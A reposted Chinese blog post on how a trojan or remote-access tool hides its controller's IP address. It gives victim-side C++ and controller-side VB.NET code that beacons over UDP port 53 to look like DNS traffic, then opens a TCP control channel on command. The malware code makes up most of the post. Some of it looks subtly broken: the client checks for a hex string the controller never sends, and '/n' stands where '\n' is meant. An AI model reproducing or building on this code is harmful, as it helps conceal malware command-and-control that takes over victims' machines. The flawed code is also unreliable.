转载

浅谈木马如何隐藏上线IP地址

木马也叫RAT，或者叫远程管理软件，关于如何隐藏IP地址，应该有不少人在研究，比如ROOTKIT实现文件隐藏、进程隐藏、网络连接隐藏等等。本人才疏学浅,没有深入研究过ROOTKIT，只是谈谈应用层的技术。

下面给出流程图:

浅谈木马如何隐藏上线IP地址

解释一下流程图的原理，UDP网络协议是面向无连接的，和TCP协议的三次握手不同。

用系统自带的查看网络连接的命令 netstat -ano 是查看不到远程IP地址和端口的，用第三方软件或者工具也同样查看不到，如以前的冰刃、360网络连接查看器等等。

下面结合源代码和效果图来说明下IP地址是如何隐藏的。

被控端关键源代码(C++):

DWORD WINAPI ConnTask::InitUdpConn(LPVOID lpParameter) {  WSADATA WSA;   if ((WSAStartup(MAKEWORD(2,2),&WSA)) != 0)  {   printf("[e]WSAStartup Error!/n");  }  boolean IsUdpConn=true;  int timeout=1000;  while(IsUdpConn)  {   try   {   Sleep(UdpTime);     SOCKET sockClient=socket(AF_INET,SOCK_DGRAM,0);   setsockopt(sockClient,SOL_SOCKET,SO_SNDTIMEO,(const char*)&timeout,sizeof(int));   setsockopt(sockClient, SOL_SOCKET, SO_RCVTIMEO, (const char *)&timeout, sizeof(int) );   SOCKADDR_IN addrSrv;    //域名上线   struct hostent *host = gethostbyname(g_remote_host.c_str());   addrSrv.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr*)(host->h_addr))));   addrSrv.sin_family=AF_INET;   addrSrv.sin_port=htons(53);   u_long ul=1;//代表非阻塞   ioctlsocket(sockClient,FIONBIO,&ul);//设置为非阻塞连接   string sendStr = "0x4869";   sendto(sockClient,sendStr.c_str(),strlen(sendStr.c_str())+1,0,(SOCKADDR*)&addrSrv,sizeof(SOCKADDR));   u_long ulu=0;//代表阻塞   ioctlsocket(sockClient,FIONBIO,&ulu);//设置为阻塞连接   int len=sizeof(SOCKADDR);   char recvBuf[14]={0};   recvfrom(sockClient,recvBuf,14,0,(SOCKADDR*)&addrSrv,&len);   string recvStr=recvBuf;   if (0 == strncmp(recvStr.c_str(), "4F70656E546370",14))   {    IsUdpConn=false;    InitTcpConn();    closesocket(sockClient);   }   SYSTEMTIME sys;   GetLocalTime( &sys );   printf("udprecv time: %02d:%02d:%02d ",sys.wHour,sys.wMinute, sys.wSecond);   printf("%s/n",recvStr.c_str());   closesocket(sockClient);   }catch(...)  //捕获任意类型异常   {   }  }  WSACleanup(); }

控制端关键源代码(vb.net):

Private Sub InitUdp()   Try      Dim udpServer As New UdpClient(53)'53号端口是DNS 协议端口,隐蔽性好。      Dim groupEP As New IPEndPoint(IPAddress.Any, 53)      While (True)       Dim buffer As Byte() = udpServer.Receive(groupEP)       Dim revStr As String = Encoding.UTF8.GetString(buffer, 0, buffer.Length)       Dim ipaddr As String = groupEP.Address.ToString()       Dim MessageIn As New gDelegate(AddressOf displayTxt)       Me.Invoke(MessageIn, ipaddr & " " & revStr)       udpServer.Send(Encoding.UTF8.GetBytes("OpenTcp"), 7, groupEP)      End While     Catch ex As SocketException      Debug.Print(ex.ToString())      'MsgBox(ex.ToString())     Catch e As Exception      Debug.Print(e.ToString())      'MsgBox(e.ToString())     Finally     End Try    End Sub

上面的代码只是用来测试用的，真正的木马源代码会有少量的变化。

下面是测试程序效果图。

被控端:

浅谈木马如何隐藏上线IP地址

控制端:

浅谈木马如何隐藏上线IP地址

控制端我这里用的是内网的IP地址，用公网IP地址也是一样的效果。

到了这里有人会问, 最后你这里还是会用TCP 来建立连接, TCP连接就会有网络连接的远程IP地址。是的，没错，确实能看到网络连接、IP地址也能查看到。这样是不是就没有必要之前的步骤了, 我个人看法是有必要; 为什么? 因为绝大多数木马都是开机自启动的, 自启动后控制端并不一定处于监听状态。可能1个小时，也可能一天或者一个月。只要控制端不处于监听状态，被控端就一直查不到远程的IP地址。还有一个步骤这里说明下，当控制端发送完指令后，比如文件上传下载、执行命令、屏幕捕获等等木马常用的功能, 当发送完这些指令后, 控制端可以随时发送断开 TCP 连接的指令，让被控端再次进入UDP发送消息的流程中，这样 IP 地址再次隐藏。